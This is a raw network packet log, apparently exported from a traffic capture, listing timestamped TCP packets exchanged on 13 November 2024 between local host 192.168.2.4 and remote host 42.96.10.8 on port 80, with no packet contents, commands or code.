                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179846048 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179847002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179855108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179863930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179872036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179902077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179986954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.180022955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.180030107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.180126905 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216214895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216238976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216253042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216262102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216269970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216279030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216335058 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216335058 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216470003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216480017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216487885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216496944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216548920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216557980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216578007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216610909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216618061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216639042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216649055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216660023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216667891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216671944 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216671944 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216711044 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.216711044 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.218900919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.218910933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.218919039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.218957901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.218966961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.218981981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.218985081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.218990088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.218998909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219027042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219094038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219103098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219111919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219120979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219130993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219141006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219144106 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219173908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219173908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219173908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219338894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219346046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219361067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219376087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219384909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219393969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219417095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219424963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219434023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219439030 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219439030 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219443083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219453096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219461918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219470024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219470978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219479084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219490051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219497919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219497919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219500065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219508886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219518900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219521999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219527960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219533920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.219558954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248538017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248565912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248583078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248593092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248601913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248613119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248625040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248636007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248652935 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248652935 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248661041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248671055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248681068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248692036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248703003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248712063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248720884 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248720884 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248735905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248735905 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248745918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248755932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248764992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248776913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248786926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248809099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248809099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248858929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248869896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248879910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248884916 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248888969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248899937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248905897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248910904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248918056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248920918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248929024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248958111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248969078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248979092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248989105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.248999119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.249020100 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.249020100 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.249047041 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.254380941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.254390955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.254400969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.254512072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.254522085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.254530907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.254539013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.254612923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.254623890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.254635096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.254646063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.254657984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.254659891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.254688025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.254759073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.254770041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.255345106 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.261451006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.275939941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.275950909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.275960922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.275969028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.275979042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.275989056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.276087999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.276087999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.276540041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.276549101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.276643038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.276654005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.276669979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.276684999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.276707888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.276719093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.276727915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.276736975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.276737928 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.276737928 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.276746988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.276757956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.276767969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.276771069 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.276803017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.276813030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.276853085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.277451038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.283647060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.283658981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.283668995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.283709049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.283770084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.283912897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.283921003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.283931017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.283977032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.283987999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.283996105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284116983 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284550905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284562111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284596920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284607887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284630060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284640074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284662008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284662008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284678936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284689903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284699917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284733057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284734011 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284744978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284754038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284774065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284800053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284837008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284847975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284854889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284871101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284881115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284883976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284889936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284903049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284915924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284917116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284941912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284953117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284953117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284953117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284962893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284974098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284985065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.284995079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285005093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285015106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285027027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285027027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285056114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285056114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285073042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285084009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285093069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285104990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285115004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285125017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285136938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285170078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285171986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285181999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285191059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285201073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285212040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285223961 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285223961 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285249949 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285249949 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285257101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285265923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285274982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285288095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285298109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285310030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285356045 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285356045 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285427094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285437107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285446882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285456896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285516024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285516024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285815954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285826921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285835981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285845995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285870075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285876036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285880089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285890102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285907030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285917044 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285917044 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285922050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285933971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285943031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285953045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285964012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285974026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285995007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285995007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.285995960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286005020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286014080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286024094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286031961 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286031961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286041975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286057949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286071062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286071062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286072969 CET804973342.96.10.8192.168.2.4
